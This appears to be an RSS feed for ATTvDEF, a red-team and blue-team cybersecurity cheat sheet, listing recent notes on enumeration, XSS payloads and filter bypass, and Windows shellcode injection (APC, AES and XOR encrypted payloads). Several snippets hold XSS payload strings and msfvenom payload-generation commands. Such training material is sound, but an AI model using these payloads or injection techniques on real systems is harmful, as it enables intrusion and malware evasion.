<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
    <channel>
      <title>ATTvDEF</title>
      <link>https://adolfcna.github.io/ATTvDEF</link>
      <description>Last 10 notes on ATTvDEF</description>
      <generator>Quartz -- quartz.jzhao.xyz</generator>
      <item>
    <title>Enumeration</title>
    <link>https://adolfcna.github.io/ATTvDEF/OWASP/Enumeration</link>
    <guid>https://adolfcna.github.io/ATTvDEF/OWASP/Enumeration</guid>
    <description><![CDATA[ Passive Google Dork (Google Hacking) Google Dorking is a passive reconnaissance technique that uses advanced Google search operators to discover hidden or sensitive information about a target website. ]]></description>
    <pubDate>Sat, 14 Mar 2026 09:19:15 GMT</pubDate>
  </item><item>
    <title>Payload</title>
    <link>https://adolfcna.github.io/ATTvDEF/OWASP/XSS/Payload</link>
    <guid>https://adolfcna.github.io/ATTvDEF/OWASP/XSS/Payload</guid>
    <description><![CDATA[ &lt;a onclick=&quot;alert(omurugur);&quot;&gt;/ &quot;&gt;&lt;img src=x onerror=prompt(/omur/)&gt; &quot;);&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;&quot; &quot;&gt;&lt;aUdIo SrC=x OnErRoR=alert(71465)&gt;&#039;);&quot; &quot;&gt;&lt;svg/onload;=alert(1)&gt; ?templid=1%27%22%3E%3Cscript%3... ]]></description>
    <pubDate>Sat, 14 Mar 2026 09:19:15 GMT</pubDate>
  </item><item>
    <title>XSS Payload Vault (Advanced Collapsible)</title>
    <link>https://adolfcna.github.io/ATTvDEF/OWASP/XSS/XSS</link>
    <guid>https://adolfcna.github.io/ATTvDEF/OWASP/XSS/XSS</guid>
    <description><![CDATA[ 🧨 XSS Payload Vault Overview Structured vault for common XSS payload families, organized by execution context for fast offensive testing and filter bypass analysis. ]]></description>
    <pubDate>Sat, 14 Mar 2026 09:19:15 GMT</pubDate>
  </item><item>
    <title>index</title>
    <link>https://adolfcna.github.io/ATTvDEF/</link>
    <guid>https://adolfcna.github.io/ATTvDEF/</guid>
    <description><![CDATA[ Red Team &amp; Blue Team Operations Cheat Sheet ATTvDEF – Cybersecurity Cheat Sheet ATTvDEF is a comprehensive cheat sheet and study guide for cybersecurity professionals. ]]></description>
    <pubDate>Fri, 13 Mar 2026 14:26:20 GMT</pubDate>
  </item><item>
    <title>shellcode in Text Section</title>
    <link>https://adolfcna.github.io/ATTvDEF/Resource-Development/Malware/Process-Injection/Classic-Methods/Local-shellcode-Injection/Different-Section-Injection/Shellcode-Injection</link>
    <guid>https://adolfcna.github.io/ATTvDEF/Resource-Development/Malware/Process-Injection/Classic-Methods/Local-shellcode-Injection/Different-Section-Injection/Shellcode-Injection</guid>
    <description><![CDATA[  graph TD A[PE Executable File] A --&gt; B[PE Header] A --&gt; C[Sections] subgraph &quot;PE Sections&quot; C --&gt; D[.text Section&lt;br&gt;Executable Code] C --&gt; E[.data Section&lt;br&gt;Global Variables] C --&gt; F[.rsrc Section&lt;br&gt;Resources] end subgraph &quot;Shellcode Storage Techniq... ]]></description>
    <pubDate>Fri, 13 Mar 2026 13:58:46 GMT</pubDate>
  </item><item>
    <title>Base64 Encoding Shellcode Injection</title>
    <link>https://adolfcna.github.io/ATTvDEF/Resource-Development/Malware/Process-Injection/Classic-Methods/Local-shellcode-Injection/Encode/Base64</link>
    <guid>https://adolfcna.github.io/ATTvDEF/Resource-Development/Malware/Process-Injection/Classic-Methods/Local-shellcode-Injection/Encode/Base64</guid>
    <description><![CDATA[ 1. ]]></description>
    <pubDate>Fri, 13 Mar 2026 13:58:46 GMT</pubDate>
  </item><item>
    <title>Web Application Architecture</title>
    <link>https://adolfcna.github.io/ATTvDEF/OWASP/Web-Application-Architecture</link>
    <guid>https://adolfcna.github.io/ATTvDEF/OWASP/Web-Application-Architecture</guid>
    <description><![CDATA[  Web Application Architecture flowchart TD subgraph Client Side B1(chrome HTML/CSS,JavaScript,Cookies,storage) B2(firefox HTML/CSS,JavaScript,Cookies,storage) B3(Onion HTML/CSS,JavaScript,Cookies,storage) end subgraph Server Side WS[Web Server&lt;br&gt;Nginx,Apache,iis] AS[Application Server&lt;br&g... ]]></description>
    <pubDate>Fri, 13 Mar 2026 09:38:47 GMT</pubDate>
  </item><item>
    <title>AES Encryption</title>
    <link>https://adolfcna.github.io/ATTvDEF/Resource-Development/Malware/Process-Injection/Classic-Methods/Local-shellcode-Injection/Encryption/AES</link>
    <guid>https://adolfcna.github.io/ATTvDEF/Resource-Development/Malware/Process-Injection/Classic-Methods/Local-shellcode-Injection/Encryption/AES</guid>
    <description><![CDATA[  Generate Raw Payload with msfvenom msfvenom Command msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.ico Generates a raw 64-bit Windows payload that executes calc.exe and saves it as calc.ico. ]]></description>
    <pubDate>Fri, 13 Mar 2026 09:38:47 GMT</pubDate>
  </item><item>
    <title>XOR Encryption</title>
    <link>https://adolfcna.github.io/ATTvDEF/Resource-Development/Malware/Process-Injection/Classic-Methods/Local-shellcode-Injection/Encryption/XOR</link>
    <guid>https://adolfcna.github.io/ATTvDEF/Resource-Development/Malware/Process-Injection/Classic-Methods/Local-shellcode-Injection/Encryption/XOR</guid>
    <description><![CDATA[ Generate Raw Payload msfvenom Command msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.ico Generates a raw 64-bit Windows payload that executes calc.exe. ]]></description>
    <pubDate>Fri, 13 Mar 2026 09:38:47 GMT</pubDate>
  </item><item>
    <title>Async Procedure Call</title>
    <link>https://adolfcna.github.io/ATTvDEF/Resource-Development/Malware/Process-Injection/Classic-Methods/Remote-Shellcode-Injection/APC-Shellcode-Injection/APC-Injection</link>
    <guid>https://adolfcna.github.io/ATTvDEF/Resource-Development/Malware/Process-Injection/Classic-Methods/Remote-Shellcode-Injection/APC-Shellcode-Injection/APC-Injection</guid>
    <description><![CDATA[  MSF MSF msfvenom -p windows/x64/messagebox --platform windows -a x64 TITLE=CNA TEXT=&quot;Wellcome To The ATTvDEF&quot; -f raw -o msg AES Encryption AES Encryption import sys import os import hashlib import ctypes # ----------------------------- # PKCS7 Padding # ----------------------------- def p... ]]></description>
    <pubDate>Fri, 13 Mar 2026 09:38:47 GMT</pubDate>
  </item>
    </channel>
  </rss>